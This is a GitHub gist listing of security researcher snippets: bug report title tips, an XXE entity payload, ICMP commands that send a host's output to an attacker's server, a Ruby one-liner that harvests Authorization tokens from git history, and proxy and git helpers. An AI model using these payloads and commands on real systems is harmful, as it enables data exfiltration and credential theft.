Skip to content

Instantly share code, notes, and snippets.

View jobertabma's full-sized avatar

Jobert Abma jobertabma

904 followers · 0 following
View GitHub Profile
@jobertabma
jobertabma / report-title-tips.md
Created June 11, 2017 22:25
  • Practice to exclude vulnerability type(s)
    • Why: this makes it easier for the receiver to identify the root cause of the vulnerability and duplicates faster. When there are multiple vulnerabilities, and there's no chain, consider them being separate reports. Expect that your reports will be escalated to people that have never heard security lingo like XSS. Help them understand the vulnerability and give remediation advice where possible.
    • Good title: Lack of input sanitization in name parameter on https://register.example.com/new leads to execution of JavaScript in user session.
    • OK title: Reflected XSS in name parameter on https://register.example.com/new
    • Poor title: XSS
  • Mention the affected asset
  • Why: different people or teams are often responsible for different assets. Decrease triage overhead by mentioning the asset, such as a domain name, mobile app, device, version number, or URL, in the title so it's easier to assign it to someone with more knowledge abo
@jobertabma
jobertabma / attack.xml
Created June 13, 2017 17:39 — forked from janmartenjongerius/attack.xml
XXE attack using PHP
<!DOCTYPE scan [
<!ENTITY test SYSTEM "target.xml">
]><scan>&test;</scan>
@jobertabma
jobertabma / icmp.md
Last active September 14, 2022 15:02
Commands to exfiltrate command output via ICMP packet size
  1. Capture ICMP packets on your server:
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap
  1. Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:
ip=vm03;output=`hostname`;for ((i=0;i&lt;${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done
@jobertabma
jobertabma / alias.sh
Created August 2, 2017 00:46
Bash alias for enabling HTTPS and HTTP proxy
alias proxy-on="sudo networksetup -setsecurewebproxy 'Wi-Fi' 127.0.0.1 9090 && sudo networksetup -setwebproxy 'Wi-Fi' 127.0.0.1 9090"
alias proxy-off="sudo networksetup -setsecurewebproxystate 'Wi-Fi' off && sudo networksetup -setwebproxystate 'Wi-Fi' off"
@jobertabma
jobertabma / extract-authorization-header-for-vcr.rb
Created August 24, 2017 18:29
One-liner to reset last 1000 git commits and extract the Authorization header to look for tokens from VCR cassettes
# VCR cassettes stored in JSON
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.json').map { |f| c = JSON.parse(IO.read(f)); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq
# VCR cassettes stored in YAML
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.yml').map { |f| c = YAML.load_file(f); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq
@jobertabma
jobertabma / git-inspect.sh
Last active March 13, 2018 23:26
A script to manually iterate over git commits. Use qj/qk to navigate.
DIFF_NUMBER=1
while read -n1 -r -p "$DIFF_NUMBER:" && [[ $REPLY != q ]]; do
case $REPLY in
j)
DIFF_NUMBER=`expr $DIFF_NUMBER + 1`
;;
k)
DIFF_NUMBER=`expr $DIFF_NUMBER - 1`
;;